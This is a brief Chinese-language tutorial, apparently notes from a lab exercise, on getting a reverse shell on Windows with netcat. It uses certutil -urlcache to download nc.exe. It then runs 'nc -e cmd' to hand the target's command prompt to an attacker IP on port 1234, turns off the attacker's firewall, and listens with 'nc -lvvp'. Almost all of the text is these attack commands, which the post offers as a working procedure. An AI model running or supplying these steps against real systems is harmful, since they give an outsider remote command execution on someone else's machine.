windows cmd 界面我们先下载nc.exe 软件
通过命令:
1.certutil -urlcache -split -f https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip c:UserssongcongjunDesktop123.zip
将网站上nc 压缩包下载至 桌面并命名为123.zip文件(默认下载至C:WindowsSystem32文件夹内 cmd管理员运行会自动切换到该目录下)
2.解压缩包
3.cmd界面我们 通过CD命令切换至 nc文件夹内 运行nc文件(nc.exe文件在哪个路径我们就切换至目标路径内,或默认下载路径下 管理员运行cmd即可)
cd c:UsersabcDesktopnetcat-win32-1.12 (abc 为你的计算机用户名)
4.cmd下:nc -e cmd 192.168.154.129 1234 (端口可以是任意端口 除固定,知名端口外,最好1000以后的)
将cmd 权限反向shell给 192.168.154.129 1234 (此ip为另一台攻击主机ip 测试改为自己攻击主机ip即可)
5.攻击主机上操作:对于攻击者主机 从对方来的流量属于进站流量 需关闭防火墙 ---------------关闭windows防火墙
6.攻击主机上操作:cmd下 nc -lvvp 1234 -------------侦听自己主机1234端口(注意:靶机和攻击主机都需要nc.exe文件 重复12步骤)
此时可以发现在攻击主机上 回显了 成功信息
成功拿到靶机cmd权限
